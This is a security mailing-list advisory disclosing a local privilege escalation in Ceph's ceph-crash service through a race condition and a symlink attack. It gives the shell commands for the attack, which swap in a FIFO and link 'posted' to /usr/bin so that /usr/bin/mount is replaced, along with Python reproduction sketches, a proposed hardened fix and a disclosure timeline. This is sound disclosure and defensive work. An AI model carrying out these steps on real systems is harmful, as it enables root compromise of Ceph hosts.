Date: Tue, 25 Oct 2022 12:00:11 +0200
From: Matthias Gerstner <>
Subject: ceph: ceph-crash.service allows local ceph user to root exploit

Hello list,

this report is about a ceph user to root privilege escalation in the
ceph-crash systemd service which is part of the ceph-base component of
the Ceph distributed storage system project [1]. This report relates to
Ceph version 16.2.9.

The Vulnerability

The ceph-crash.service [2] runs the ceph-crash Python script [3] as
root. The script operates in the directory /var/lib/ceph/crash, which
is controlled by the unprivileged ceph user (ceph:ceph mode 0750). The
script periodically scans for new crash directories and forwards their
content via `ceph crash post`. This setup is subject to security
issues that allow the ceph user to:

1) post arbitrary data as a "crash dump", even content from private
   files owned by root. The consequences of this are not fully clear to me;
   it could be an information leak if the security domain of "root" on the
   system differs from the security domain of wherever the ceph-crash
   data is sent to or accessible afterwards. The `ceph crash post`
   command expects JSON input, however, which limits the attacker's
   degree of freedom here.

2) cause a denial of service by feeding large amounts of data into the
   `ceph crash post` process. This can cause high memory and CPU
   consumption. By placing a symlink or FIFO into the directory instead of
   an actual file, the script can also be made to read from a device file
   like /dev/random or to block forever.

3) cause a local ceph to root privilege escalation by tricking
   ceph-crash into moving a ceph-controlled file into a privileged file
   system location.
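Items 1) and 2) rest on the fact that a "regular file" check which
follows symlinks says nothing about what the directory entry really is.
The following minimal Python sketch illustrates this, assuming the
check is done with `os.path.isfile()` (an assumption for illustration,
not a quote from the ceph-crash source); the temporary paths and the
`describe()` helper are hypothetical:

```python
import os
import stat
import tempfile


def describe(path: str) -> dict:
    """Contrast a symlink-following check with an lstat()-based one."""
    return {
        # os.path.isfile() uses stat(), which follows symlinks
        "isfile": os.path.isfile(path),
        # os.lstat() looks at the directory entry itself
        "is_symlink": stat.S_ISLNK(os.lstat(path).st_mode),
    }


with tempfile.TemporaryDirectory() as tmp:
    # hypothetical stand-in for a private, root-owned file
    secret = os.path.join(tmp, "secret")
    with open(secret, "w") as f:
        f.write("private data\n")

    # fake crash directory whose "meta" entry is a symlink to the secret
    crash = os.path.join(tmp, "crash1")
    os.mkdir(crash)
    meta = os.path.join(crash, "meta")
    os.symlink(secret, meta)

    result = describe(meta)
    with open(meta) as f:
        leaked = f.read()

print(result)  # {'isfile': True, 'is_symlink': True}
print(leaked, end="")  # private data
```

A root process that trusts such a check reads, and forwards, whatever
the link points to. Switching the check to `os.lstat()` alone would
still leave a window between check and use, so the file has to be
opened safely instead of merely checked.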

Item 3) is the most critical of these possibilities. The ceph-crash
script basically does the following at a regular interval (by default
every 10 minutes):

a) it iterates over all sub-directories of /var/lib/ceph/crash
   and for each sub-directory it does the following:
  b) it checks whether <crash>/meta is a regular file; if not then the
     dir is skipped.
  c) it checks whether <crash>/done is a regular file; if not then it
     sleeps for one second and checks again; if still not then the dir
     is skipped.
  d) it feeds the content of <crash>/meta to stdin of the command line
         timeout 30 ceph -n <auth> crash post -i -
  e) only if the crash post succeeded (exit code 0) will the script
     attempt to rename <crash> to /var/lib/ceph/crash/posted/<crash>.
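The loop in steps a) to e) can be sketched in Python as follows. This
is a simplified reconstruction from the description above, not the
actual ceph-crash source [3]; the auth name `client.crash`, the `post`
and `wait` parameters and the temporary-directory demo are assumptions
added so that the sketch runs without a Ceph cluster:

```python
import os
import subprocess
import tempfile
import time
from typing import Callable


def post_crash(meta_path: str, auth: str = "client.crash") -> int:
    """Step d): pipe <crash>/meta into `ceph crash post` (auth name assumed)."""
    with open(meta_path, "rb") as f:
        data = f.read()
    proc = subprocess.run(
        ["timeout", "30", "ceph", "-n", auth, "crash", "post", "-i", "-"],
        input=data,
        capture_output=True,
    )
    return proc.returncode


def scrape(crash_dir: str, post: Callable[[str], int] = post_crash,
           wait: float = 1.0) -> None:
    for name in os.listdir(crash_dir):                 # step a)
        crash = os.path.join(crash_dir, name)
        meta = os.path.join(crash, "meta")
        done = os.path.join(crash, "done")
        if not os.path.isfile(meta):                   # step b)
            continue
        if not os.path.isfile(done):                   # step c)
            time.sleep(wait)                           # the race window
            if not os.path.isfile(done):
                continue
        if post(meta) == 0:                            # steps d) and e)
            # path-based rename: a symlinked "posted" is followed
            os.rename(crash, os.path.join(crash_dir, "posted", name))


# demo with a stubbed "ceph crash post" that always succeeds
with tempfile.TemporaryDirectory() as base:
    os.mkdir(os.path.join(base, "posted"))
    os.mkdir(os.path.join(base, "crash1"))
    for fname in ("meta", "done"):
        open(os.path.join(base, "crash1", fname), "w").close()
    scrape(base, post=lambda meta: 0, wait=0)
    moved = os.listdir(os.path.join(base, "posted"))

print(moved)  # ['crash1']
```

Nothing ties the path checked in b) and c), the file read in d) and the
entry renamed in e) to the same object: each step resolves the path
anew.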

The one-second sleep in step c) makes it easier to win the race
condition involved. A compromised ceph user account could exploit
this as follows:

- create a fake crash directory named 'mount', containing an empty
  'meta' file:

  ceph$ mkdir /var/lib/ceph/crash/mount
  ceph$ touch /var/lib/ceph/crash/mount/meta

- wait for step c) to happen, i.e. for ceph-crash to sleep for a second
  while waiting for the "done" file to appear. This can be done in an
  event-driven fashion by using the inotify API to detect the service
  opening the crash directory. While ceph-crash is sleeping, create the
  "done" file and replace "meta" with a FIFO:

  ceph$ touch /var/lib/ceph/crash/mount/done
  ceph$ rm /var/lib/ceph/crash/mount/meta
  ceph$ mkfifo /var/lib/ceph/crash/mount/meta

  On success, the ceph-crash script, upon returning from the one-second
  sleep, will block on the FIFO until the attacker writes data into
  it, giving the attacker enough time to stage the rest of the attack
  (30 seconds, because of the `timeout` frontend command used in step d)).

- while ceph-crash is busy forwarding data to `ceph crash post`, the ceph
  user can replace the "mount" directory with a regular file and prepare a
  symlink attack:

  ceph$ mv /var/lib/ceph/crash/mount /var/lib/ceph/crash/oldmount
  ceph$ echo 'echo evil code' >/var/lib/ceph/crash/mount
  ceph$ chmod 755 /var/lib/ceph/crash/mount
  ceph$ mv /var/lib/ceph/crash/posted /var/lib/ceph/crash/posted.old
  ceph$ ln -s /usr/bin /var/lib/ceph/crash/posted
  # unblock the ceph-crash script
  ceph$ echo "$FAKE_JSON_DATA" >/var/lib/ceph/crash/oldmount/meta

If this succeeds in time, then during step e) the ceph-crash script will
rename the ceph-controlled "mount" file to /usr/bin/mount, thereby
replacing the system binary "mount" with the ceph-controlled script. Any
root process that invokes it afterwards executes the exploit code. Any
other binary could be targeted in the same way, as could configuration
files in /etc that allow the system to be compromised.

Because /var/lib/ceph/crash is not world-writable and has no sticky bit,
the Linux kernel's symlink protection does not come to the rescue in
this configuration. A precondition, however, is that /var/lib/ceph
resides on the same file system as the target directory of the
`rename()`, because `rename()` does not work across file system
boundaries. In many default Linux setups this is the case, though.
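The effect of step e) under these conditions can be reproduced
unprivileged in a temporary directory. In this sketch a hypothetical
`bin` directory stands in for /usr/bin and `move_into()` is a
hypothetical helper mirroring the path-based rename; since both
directories live under the same temporary directory, the
same-file-system precondition holds:

```python
import errno
import os
import tempfile


def move_into(src: str, dest_dir: str) -> None:
    """Rename src to dest_dir/<basename>, resolving dest_dir by path."""
    target = os.path.join(dest_dir, os.path.basename(src))
    try:
        os.rename(src, target)
    except OSError as e:
        if e.errno == errno.EXDEV:
            # rename() refuses to move entries across file systems
            raise RuntimeError("source and target are on different file systems") from e
        raise


with tempfile.TemporaryDirectory() as tmp:
    crash_dir = os.path.join(tmp, "crash")
    bin_dir = os.path.join(tmp, "bin")  # stand-in for /usr/bin
    os.mkdir(crash_dir)
    os.mkdir(bin_dir)

    # attacker-controlled regular file and a "posted" symlink
    with open(os.path.join(crash_dir, "mount"), "w") as f:
        f.write("echo evil code\n")
    os.symlink(bin_dir, os.path.join(crash_dir, "posted"))

    move_into(os.path.join(crash_dir, "mount"), os.path.join(crash_dir, "posted"))
    landed = sorted(os.listdir(bin_dir))
    posted_is_link = os.path.islink(os.path.join(crash_dir, "posted"))

print(landed)  # ['mount']
```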


Attached to this e-mail is a proof of concept exploit script that
demonstrates the vulnerability. Running the script with ceph:ceph
credentials pretty reliably replaces /usr/bin/mount by a ceph controlled
script. Since ceph-crash only executes its routine every 10 minutes, it
can take a while to succeed if the race is not won right away, but
success is well within reach in a real-world scenario.

I did not test this in a real-world Ceph setup. For testing purposes I
let the invocation of "ceph crash post" always succeed. From reading the
Python code executed by "ceph crash post", I believe that the JSON data I
use in the exploit script should be accepted and lead to a zero exit
code.

Possible Fix

To fix the issue, the simplest route I see would be to run the
ceph-crash script as ceph:ceph as well. If this is not possible for some
reason, then a careful selection of system calls and/or temporary
privilege drops will be necessary in the ceph-crash script to avoid
symlink attacks and other race conditions at the file system level.
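If ceph-crash has to keep running as root, the "careful selection of
system calls" could look roughly like the following minimal Python
sketch. It assumes Linux and Python's `dir_fd` support; the helper
names, the 1 MiB `MAX_META` limit and the `st_nlink` check against
hard-linked foreign files are hypothetical choices for illustration,
not the upstream fix. Every lookup is made relative to a directory
descriptor opened with `O_NOFOLLOW`, "meta" is opened with `O_NONBLOCK`
so that a FIFO cannot block the service, only a regular file is
accepted, and the read is size-capped:

```python
import os
import stat
import tempfile

MAX_META = 1 << 20  # hypothetical cap on crash metadata size (1 MiB)
DIR_FLAGS = os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW


def read_meta_safely(base_fd: int, name: str) -> bytes:
    """Read <name>/meta without following symlinks or blocking on FIFOs."""
    crash_fd = os.open(name, DIR_FLAGS, dir_fd=base_fd)
    try:
        fd = os.open("meta", os.O_RDONLY | os.O_NOFOLLOW | os.O_NONBLOCK,
                     dir_fd=crash_fd)
    finally:
        os.close(crash_fd)
    try:
        st = os.fstat(fd)
        # reject FIFOs, devices and extra hard links to foreign files
        if not stat.S_ISREG(st.st_mode) or st.st_nlink != 1:
            raise ValueError(f"{name}/meta is not a plain regular file")
    except BaseException:
        os.close(fd)
        raise
    with os.fdopen(fd, "rb") as f:  # f now owns and closes fd
        data = f.read(MAX_META + 1)
    if len(data) > MAX_META:
        raise ValueError(f"{name}/meta exceeds {MAX_META} bytes")
    return data


def move_to_posted(base_fd: int, name: str) -> None:
    """Move <name> into posted/ without resolving "posted" by path."""
    posted_fd = os.open("posted", DIR_FLAGS, dir_fd=base_fd)
    try:
        os.rename(name, name, src_dir_fd=base_fd, dst_dir_fd=posted_fd)
    finally:
        os.close(posted_fd)


with tempfile.TemporaryDirectory() as tmp:
    for d in ("posted", "crash1", "fifo_crash", "link_crash"):
        os.mkdir(os.path.join(tmp, d))
    with open(os.path.join(tmp, "crash1", "meta"), "w") as f:
        f.write('{"crash_id": "example"}')
    os.mkfifo(os.path.join(tmp, "fifo_crash", "meta"))
    os.symlink(os.path.join(tmp, "crash1", "meta"),
               os.path.join(tmp, "link_crash", "meta"))

    base_fd = os.open(tmp, os.O_RDONLY | os.O_DIRECTORY)
    try:
        good = read_meta_safely(base_fd, "crash1")
        rejected = []
        for bad in ("fifo_crash", "link_crash"):
            try:
                read_meta_safely(base_fd, bad)
            except (OSError, ValueError):
                rejected.append(bad)
        move_to_posted(base_fd, "crash1")
        posted = os.listdir(os.path.join(tmp, "posted"))
    finally:
        os.close(base_fd)

print(good, rejected, posted)
```

With this approach a symlinked "posted" makes the `open()` fail instead
of redirecting the rename, and swapping "posted" after the `open()` no
longer changes where the entry ends up. Running the whole service as
ceph:ceph remains the simpler option.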

The systemd service, the ceph-crash script and also the directory
permissions for /var/lib/ceph/crash are not specific to SUSE packaging
but are already found in the upstream sources. Fedora Linux, for
example, ships with the same setup.

I reported this finding to the Ceph security mailing list a while ago.
Red Hat assigned the CVE for the issue. I have not yet received
confirmation from their side whether the issue could be reproduced with
a real-world Ceph setup. I also have not heard about upstream's plans
and schedule for an actual bugfix.

Timeline

2022-09-22: I reported the vulnerability to suggesting
            an embargo period of 14 days.
2022-10-10: I provided some additional information to
            suggested two more weeks of embargo, because I wasn't
            available for some time and things didn't progress much.
2022-10-21: I inquired about the state of their
            analysis and bugfixing. I received the CVE for the issue.
            They suffered some delays in handling the issue, but we
            agreed to publish the full report today anyway.


Best Regards


Matthias Gerstner <>
Security Engineer
GPG Key ID: 0x14C405C971923553
SUSE Software Solutions Germany GmbH
HRB 36809, AG Nürnberg
Geschäftsführer: Ivo Totev, Andrew Myers, Andrew McDonald, Boudien Moerman

